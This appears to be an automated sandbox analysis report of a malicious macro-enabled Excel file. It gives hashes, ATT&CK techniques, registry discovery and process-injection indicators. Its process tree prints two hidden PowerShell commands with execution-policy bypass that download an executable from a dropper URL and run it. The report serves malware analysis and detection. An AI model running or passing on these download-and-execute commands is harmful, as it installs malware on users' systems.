bc4281dd49f6651a0687351c1e03f7233df53ce5155e1040aa56883c187612b3

General

Target

bc4281dd49f6651a0687351c1e03f7233df53ce5155e1040aa56883c187612b3.xlsm
Size

12KB
MD5

48be1f1540b9ffd903f32f3ab506c144
SHA1

4232cf65dfd13f7a76babe43867aa9716237b49c
SHA256

bc4281dd49f6651a0687351c1e03f7233df53ce5155e1040aa56883c187612b3
SHA512

d2a831c737ed1b599298c3af60f976d6c90a943b32c62b87cc2bbe912fb1a3cdcbc382482cbcd2b53e846868ddf26f01d743753f88ea3d8c2874cfb6bf489815

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://swiftexpresscourier.vip/SH/cov.exe

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1856	4108	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4060	4108	powershell.exe	EXCEL.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

4108 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

1856 powershell.exe
1856 powershell.exe
4060 powershell.exe
4060 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1856 powershell.exe
Token: SeDebugPrivilege 4060 powershell.exe

pid	process
1856	powershell.exe
1856	powershell.exe
4060	powershell.exe
4060	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

EXCEL.EXE

pid	process
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE
4108	EXCEL.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

EXCEL.EXE

description	pid	process	target process
PID 4108 wrote to memory of 1856	4108	EXCEL.EXE	powershell.exe
PID 4108 wrote to memory of 1856	4108	EXCEL.EXE	powershell.exe
PID 4108 wrote to memory of 4060	4108	EXCEL.EXE	powershell.exe
PID 4108 wrote to memory of 4060	4108	EXCEL.EXE	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bc4281dd49f6651a0687351c1e03f7233df53ce5155e1040aa56883c187612b3.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://swiftexpresscourier.vip/SH/cov.exe',$env:Temp+'\Filename.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy bypass -W Hidden -command (New-Object -com Shell.Application).ShellExecute($env:Temp+'\Filename.exe')
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
43f4bec966ab901ac034fc136a642fa5

SHA1
8e7227cefec8b05c9a79b2751d1261187b9c0422

SHA256
09ea65cf68920d08638db30c86eb3c90254b9b2d9f73246bc0176c86ce687ae4

SHA512
a65a2fe6acf4cb0dae8361af3e42e35c6bfaa93859e744a7779630d785a56bb030161c92a74b88a223769fdb912911146a762cf6a8afe33642e2695ea08ceec0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
6KB

MD5
e64930c6389656183f0dd68c9b7b9522

SHA1
613356ddb220bcebd4860f5168579c38117d2fda

SHA256
0939b3d10199da201c934f5347aee3951e07c94409cff6805d7ffb45db6931d0

SHA512
d4ccde43f1370af8f818af5e55de923b7d8d4bdbd84002075710e46ad27dcd30d34659fc194682bbcf11c762ea426f02c0bb682dd1267f67473984c259a4ddfa

Download Submit
memory/1856-138-0x000001B26C370000-0x000001B26C392000-memory.dmp

Filesize
136KB

Download
memory/1856-137-0x0000000000000000-mapping.dmp

Download
memory/1856-139-0x00007FFE24550000-0x00007FFE25011000-memory.dmp

Filesize
10.8MB

Download
memory/4060-140-0x0000000000000000-mapping.dmp

Download
memory/4060-144-0x00007FFE24550000-0x00007FFE25011000-memory.dmp

Filesize
10.8MB

Download
memory/4108-136-0x00007FFE0AC70000-0x00007FFE0AC80000-memory.dmp

Filesize
64KB

Download
memory/4108-130-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download
memory/4108-135-0x00007FFE0AC70000-0x00007FFE0AC80000-memory.dmp

Filesize
64KB

Download
memory/4108-134-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download
memory/4108-133-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download
memory/4108-132-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download
memory/4108-131-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download
memory/4108-146-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download
memory/4108-147-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download
memory/4108-148-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download
memory/4108-149-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads